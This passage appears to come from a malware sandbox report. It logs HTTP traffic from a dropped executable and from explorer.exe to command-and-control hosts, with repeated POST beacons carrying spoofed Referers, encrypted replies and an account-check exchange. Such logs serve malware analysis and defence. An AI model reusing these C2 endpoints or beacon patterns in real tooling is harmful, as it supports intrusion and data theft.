                                                                                                                                  date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:11.690139055 CEST6070OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://clcjalto.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 200
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:11.804989100 CEST6071INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:11.963156939 CEST6072OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://grafs.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 273
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:12.079642057 CEST6072INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:12.196327925 CEST6073OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dhlyfpb.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 145
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:12.312789917 CEST6073INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:12.366313934 CEST6074OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gnnnraawcb.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 133
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:12.481183052 CEST6074INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 73
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ee 18 29 85 ef 94 f9 20 b0 8d 91 bb 22 ac 5a 91 b8 06 6e da 3c 43 8f 5c 29 bd c0 ce 1c cc fb 51 80 9d c4 f6 3e ba 45 33 e2 d3
                                                                                                                                  Data Ascii: %S`Nh&WQY^&) "Zn<C\)Q>E3
                                                                                                                                  Oct 17, 2022 22:07:12.930023909 CEST6299OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://mkheots.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 113
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:13.046180964 CEST6299INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:13 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:13.918077946 CEST6300OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pakvlb.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 159
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:14.032011032 CEST6300INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:13 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:14.182276964 CEST6300OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nyftrqq.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 363
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:14.298707008 CEST6301INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:14 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:15.882101059 CEST6302OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://avqnngwqw.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 225
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:15.996644020 CEST6302INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:15 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:16.018100977 CEST6302OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tkavdryu.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 147
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:16.133193970 CEST6303INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:16 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:16.158435106 CEST6303OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ewgonaqm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 266
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:16.274126053 CEST6304INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:16 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 44
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 9b eb 8b f1 32 ae ce 95 a4 68
                                                                                                                                  Data Ascii: %S`Nh&WQY^]eu2h


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  19192.168.2.54970645.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:11.360502005 CEST5998OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:11.545358896 CEST6068INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 54 58 68 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 78 73 61 57 56 47 54 6c 68 68 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6d 70 6e 65 6b 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 70 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qTXhMQ0p5WVc1a1gzTjBjaUk2SWxsaWVGTlhhZXlKemFXUWlPall6TmpnekxDSjBhVzFsSWpveE5qWTJpSjk=0
                                                                                                                                  Oct 17, 2022 22:07:11.557333946 CEST6069OUTPOST /check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:11.731040955 CEST6071INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.549699157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  20192.168.2.54971134.91.216.4980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:20.761837006 CEST6855OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://yuvwvqgqwb.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 200
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:20.876308918 CEST6856INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:20 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:21.122860909 CEST6856OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tekxbw.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 336
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:21.237842083 CEST6857INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:21 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 39
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 c6 a4 83 ec 24
                                                                                                                                  Data Ascii: %S`Nh&WQY^]eu$
                                                                                                                                  Oct 17, 2022 22:07:24.214032888 CEST7358OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://vwbkimlhg.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 164
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.327697992 CEST7359INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:24.366924047 CEST7360OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ksedxblf.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 171
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.480665922 CEST7365INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:24.512083054 CEST7366OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bvenxtm.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 198
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.628086090 CEST7371INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:24.642550945 CEST7373OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://wxsohsstcq.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 236
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:24.757271051 CEST7373INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 91
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba f2 18 36 9d ba 91 a4 33 b2 84 c1 ee 22 8f 42 93 aa 2f 7d d3 72 49 97 04 74 b1 d6 88 1f 82 f7 47 df b5 ce e2 3a bd 07 22 c5 83 a1 a4 b4 f8 6e fc 00 8f 21 a4 c7 f0 3a 57 2a 14 4c 94
                                                                                                                                  Data Ascii: %S`Nh&WQY^&63"B/}rItG:"n!:W*L
                                                                                                                                  Oct 17, 2022 22:07:25.282048941 CEST7665OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://yclscqegh.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 203
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.398344994 CEST7665INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:25.482798100 CEST7666OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dcxytihxr.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 362
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.596513033 CEST7668INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
